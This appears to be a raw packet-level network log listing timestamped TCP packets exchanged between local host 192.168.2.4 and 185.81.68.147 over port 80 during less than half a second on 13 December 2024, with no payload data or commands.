Dec 13, 2024 07:47:07.797539949 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.798552990 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.798568964 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.798608065 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.798692942 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.798962116 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.799010038 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.799257994 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.800059080 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.800085068 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.800296068 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.800667048 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.800682068 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.800744057 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.800744057 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.801515102 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.801531076 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.801651955 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.802242994 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.802258015 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.802366018 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.803375959 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.803390026 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.803426981 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.803519964 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.803883076 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.803932905 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.804003954 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.804080963 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.804781914 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.804799080 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.804833889 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.805996895 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.806014061 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.806051016 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.806180000 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.806478977 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.806503057 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.806575060 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.807379961 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.807413101 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.807435036 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.807451963 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.808162928 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.808187008 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.808213949 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.808271885 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.809097052 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.809113026 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.809156895 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.810748100 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.810762882 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.810801029 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.810813904 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.810827971 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.810852051 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.810883045 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.811554909 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.811570883 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.811603069 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.811857939 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.960119963 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.960159063 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.960176945 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.960195065 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.960208893 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.960218906 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.960247993 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.960269928 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.960843086 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.961004019 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.962523937 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.962538958 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.962554932 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.962569952 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.962584019 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.962624073 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.962642908 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.962850094 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.963365078 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.963448048 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.964060068 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.964238882 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.965137959 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.965152979 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.965168953 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.965183973 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.965214014 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.965214014 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.965342999 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.966943979 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.966959953 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.966974974 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.966991901 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.967036963 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.967036963 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.968328953 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.968344927 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.968403101 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.968403101 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.969386101 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.969399929 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.969415903 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.969435930 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.969445944 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.969465971 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.969497919 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.971160889 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.971178055 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.971194029 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.971209049 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.971234083 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.971234083 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.971245050 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.971330881 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.972595930 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.972613096 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.972644091 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.972644091 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.973680019 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.973695993 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.973711967 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.973727942 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.973738909 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.973738909 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.973773003 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.973773003 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.974442959 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.974466085 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.974497080 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.974531889 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.975372076 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.975388050 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.975433111 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.975433111 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.976630926 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.976646900 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.976689100 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.977844954 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.977916002 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.977927923 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.977945089 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.977960110 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.977973938 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.978004932 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.978004932 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.978744030 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.978760004 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.978810072 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.978979111 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.979830980 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.979846954 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.979897022 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.980310917 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.980325937 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.980364084 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.981136084 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.981189966 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.981286049 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.981339931 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.982047081 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.982063055 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.982098103 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.982110977 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.982966900 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.982986927 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.983032942 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.983033895 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.984318972 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.984334946 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.984384060 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.984384060 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.984671116 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.984687090 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.984723091 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.984765053 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.985371113 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.985557079 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.985637903 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.985691071 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.986202955 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.986251116 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.986327887 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.986386061 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.987266064 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.987329960 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.987341881 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.987396955 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.988449097 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.988466978 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.988502026 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.988574028 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.988818884 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.988842010 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.988869905 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.988883972 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.989691019 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.989706039 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.989747047 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.989747047 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.990444899 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.990492105 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.990582943 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.990638018 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.991360903 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.991411924 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.991422892 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.991487026 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.992130041 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.992182016 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.992223978 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.992278099 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.992989063 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.993040085 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.993422985 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.993472099 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.993918896 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.993935108 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.993966103 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.993976116 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.994764090 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.994784117 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.994827032 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.994827032 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.995805979 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.995821953 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.995868921 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.995868921 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.996383905 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.996438026 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.996767998 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.996820927 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.997494936 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.997509956 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.997556925 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.997556925 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.998168945 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.998184919 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.998219967 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.998295069 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.998996973 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.999022007 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.999063015 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.999063015 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.999744892 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.999794960 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.999876022 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.999933958 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.000689983 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.000734091 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.000745058 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.000807047 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.001739979 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.001754999 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.001792908 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.001858950 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.002351999 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.002403021 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.002434969 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.002496004 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.003339052 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.003427029 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.003503084 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.003566980 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.003967047 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.004031897 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.152239084 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.152256966 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.152281046 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.152345896 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.152384043 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.152439117 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.153239965 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.153264999 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.153280973 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.153310061 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.153310061 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.153397083 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.154311895 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.154328108 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.154360056 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.154398918 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.155271053 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.155287027 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.155339003 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.155339003 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.156004906 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.156028032 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.156068087 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.156105995 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.156691074 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.156707048 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.156740904 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.157762051 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.157778978 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.157824993 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.157979012 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.158570051 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.158591986 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.158641100 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.158641100 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.159250021 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.159275055 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.159333944 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.160604000 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.160619020 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.160665989 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.160944939 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.160960913 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.161022902 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.161844015 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.161865950 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.161910057 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.161910057 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.163142920 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.163158894 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.163213968 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.163213968 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.163364887 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.163517952 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.163547039 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.165139914 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.165203094 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.165219069 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.165235996 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.165251017 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.165287971 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.165287971 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.165327072 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.165915966 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.165997028 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.166248083 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.166341066 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.167027950 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.167043924 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.167103052 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.167640924 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.167690992 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.167725086 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.167772055 CET	49738	80	192.168.2.4	185.81.68.147
